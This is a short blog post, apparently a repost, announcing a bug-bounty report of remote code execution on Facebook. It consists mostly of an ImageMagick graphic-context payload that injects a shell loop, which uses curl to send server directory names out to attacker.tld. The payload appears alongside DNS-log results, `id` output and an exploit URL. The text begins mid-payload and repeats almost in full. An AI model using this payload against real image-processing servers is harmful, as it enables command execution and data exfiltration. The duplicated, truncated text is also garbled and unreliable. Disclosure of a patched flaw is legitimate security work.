Facebook Remote Code Execution Vulnerability.../
viewbox 0 0 640 480
image over 0,0 0,0 'https://127.0.0.1/x.php?x=%60for i in $(ls /) ; do curl "http://$i.attacker.tld/" -d @- > /dev/null; done`'
pop graphic-context
And result was:
NAME: home.attacker.tld, Type: A
NAME: boot.attacker.tld, Type: 28
NAME: dev.attacker.tld, Type: 28
NAME: bin.attacker.tld, Type: A
…
and so on...
`id` shell command returned:
NAME: uid=99(nobody).attacker.tld., Type: 28
NAME: groups=99(nobody).attacker.tld., Type: A
NAME: gid=99(nobody).attacker.tld., Type: A
For full proof that exploit works he provided to Facebook security team with result of `cat /proc/version` output which is not going to publish in his blog.
The vulnerability was patched by Facebook team and its secure for now.
HOC team is congratulate to Andrey Leonov for bounty award, keep bug hunting as the same in future...,
BY.MICKY VERMA
Exploit URL:
https://www.facebook.com/dialog/feed?app_id=APP_ID&link=link.example.tld&picture=http%3A%2F%2Fattacker.tld%2Fexploit.png&name=news_name&caption=news_caption&description=news_descriotion&redirect_uri=http%3A%2F%2Fwww.facebook.com&ext=1476569763&hash=Aebid3vZFdh4UF1H
Payload:
push graphic-contextviewbox 0 0 640 480
image over 0,0 0,0 'https://127.0.0.1/x.php?x=%60for i in $(ls /) ; do curl "http://$i.attacker.tld/" -d @- > /dev/null; done`'
pop graphic-context
And result was:
NAME: home.attacker.tld, Type: A
NAME: boot.attacker.tld, Type: 28
NAME: dev.attacker.tld, Type: 28
NAME: bin.attacker.tld, Type: A
…
and so on...
`id` shell command returned:
NAME: uid=99(nobody).attacker.tld., Type: 28
NAME: groups=99(nobody).attacker.tld., Type: A
NAME: gid=99(nobody).attacker.tld., Type: A
For full proof that exploit works he provided to Facebook security team with result of `cat /proc/version` output which is not going to publish in his blog.
The vulnerability was patched by Facebook team and its secure for now.
HOC team is congratulate to Andrey Leonov for bounty award, keep bug hunting as the same in future...,
No comments:
Post a Comment